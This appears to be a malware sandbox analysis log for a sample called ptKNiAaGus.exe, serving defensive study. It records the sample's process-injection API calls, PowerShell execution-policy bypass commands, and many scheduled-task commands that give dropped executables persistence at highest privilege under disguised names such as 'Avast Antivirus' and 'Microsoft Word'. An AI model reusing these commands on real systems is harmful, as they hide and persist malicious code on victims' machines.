Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processorl(R)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process token adjusted: Debug
Source: C:\Users\user\xdwdPutty.exe	Process token adjusted: Debug
Source: C:\Users\user\xdwdPutty.exe	Process token adjusted: Debug
Source: C:\Users\user\xdwdPutty.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: ptKNiAaGus.exe, IPlSSVquzizB.cs	Reference to suspicious API methods: ctLKvSYSpZJt.RdVUgDBImozuSxE(wHyVdneHLsVUKq.iZWyoFPg(ncSubYLaTjDxEKi.gTPIGMjoKzHn()), wHyVdneHLsVUKq.iZWyoFPg(ncSubYLaTjDxEKi.WonKffqJoEpSsUk()), typeof(xkmuEWGEmcLRyMY.OpenProcess), ref Parameters)
Source: ptKNiAaGus.exe, IPlSSVquzizB.cs	Reference to suspicious API methods: ctLKvSYSpZJt.RdVUgDBImozuSxE(wHyVdneHLsVUKq.iZWyoFPg(ncSubYLaTjDxEKi.DWZXpvweMZwNY()), wHyVdneHLsVUKq.iZWyoFPg(ncSubYLaTjDxEKi.BzDdWBETxCu()), typeof(xkmuEWGEmcLRyMY.NtProtectVirtualMemory), ref Parameters)
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, SendToMemory.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, SendToMemory.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, SendToMemory.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, SendToMemory.cs	Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, SendToMemory.cs	Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"'

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"' & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Users\user\xdwdPutty.exe "C:\Users\user\xdwdPutty.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Corel PaintShop Pro" /tr "C:\Users\user\Videos\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Users\user\xdwdPutty.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Pong<@>40atus<@>Program Manager/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0agJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E17E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Pong<@>41atus<@>Program Manager
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E17E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Pong<@>41atus<@>Program Manager/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0agJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager@
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Pong<@>40atus<@>Program Manager
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerTcpi@.g
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager /b !g
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerTcpip_{AC25AD1E-4879-4C9B-BB59-E50724EBEC23}\Device\Tcpip_{60B2689F-C8F6-4D1B-8ED3-6BD4DA58F33E}\Device\Tcpip_{68C65ED0-D5FC-471F-BF0F-95C04D2E3B08}Mo

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Queries volume information: C:\Users\user\Desktop\ptKNiAaGus.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Queries volume information: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe VolumeInformation
Source: C:\Users\user\xdwdPutty.exe	Queries volume information: C:\Users\user\xdwdPutty.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Queries volume information: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe VolumeInformation
